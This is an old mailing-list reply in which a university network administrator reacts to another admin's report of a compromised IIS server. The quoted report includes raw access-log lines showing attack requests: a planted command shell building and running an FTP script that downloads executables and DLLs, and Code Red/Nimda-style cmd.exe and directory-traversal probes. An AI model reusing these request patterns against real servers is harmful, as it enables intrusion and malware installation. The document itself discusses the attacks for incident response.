I have found similar entries in my apache access logs. Someone must be running a tool against our site not knowing if we actually run a Microsoft product.
We know better than that. - Chris Payne On Tue, 26 Feb 2002 15:51:44 -0500, GP wrote: >Help, I recently found this on my IIS server after being contacted >that my webserver attempted to scan someone's machine on port 80. I've >looked on my web box and found the following files were installed >msxc32.exe which seems to be Mirc program which is some type of chat >program. I've talked to other techs here who have not installed this >program. I've traced the following ip addresses back to the domain >admins but before I contact I need to know if this is the intruder's ip >address and what would be the best course of action. On the flip side >what do I need to do to prevent this from happening in the future? I >have since blocked these addresses but this is only a temp fix. > >18:56:21 156.63.205.48 GET >/iisadmpwd/fuck.exe?/c+echo+get+shouldNT32.ocx+c:shouldNT32.ocx>>xl32.scr >502 >18:56:23 156.63.205.2 GET >/iisadmpwd/fuck.exe?/c+echo+get+shtlng32.dll+c:shtlng32.dll>>xl32.scr 502 >18:56:25 156.63.205.48 GET >/iisadmpwd/fuck.exe?/c+echo+get+smba.dll+c:smba.dll>>xl32.scr 502 >18:56:27 156.63.205.2 GET >/iisadmpwd/fuck.exe?/c+echo+get+sndrec32.dl_+c:sndrec32.dl_>>xl32.scr 502 >18:56:33 156.63.205.48 GET >/iisadmpwd/fuck.exe?/c+echo+get+thds32.exe+c:thds32.exe>>xl32.scr 502 >18:56:35 156.63.205.2 GET >/iisadmpwd/fuck.exe?/c+echo+get+winsd32.ocx+c:winsd32.ocx>>xl32.scr 502 >18:56:37 156.63.205.48 GET >/iisadmpwd/fuck.exe?/c+echo+get+holes.txt+c:holes.txt>>xl32.scr 502 >18:56:39 156.63.205.47 GET /iisadmpwd/fuck.exe?/c+echo+bye>>xl32.scr 502 >18:56:54 156.63.205.2 GET /iisadmpwd/fuck.exe?/c+ftp+-s:xl32.scr+-n+-d 502 >20:20:36 216.158.145.245 GET /scripts/root.exe?/c+dir 404 >20:20:36 216.158.145.245 GET /MSADC/root.exe?/c+dir 404 >20:20:36 216.158.145.245 GET /c/winnt/system32/cmd.exe?/c+dir 404 >20:20:36 216.158.145.245 GET /d/winnt/system32/cmd.exe?/c+dir 404 >20:20:36 216.158.145.245 GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404 >20:20:36 216.158.145.245 GET > > > - - Chris Payne Network Administrator Physical Resources Dept, University of Guelph (519)824-4120 x2882 [EMAIL PROTECTED]
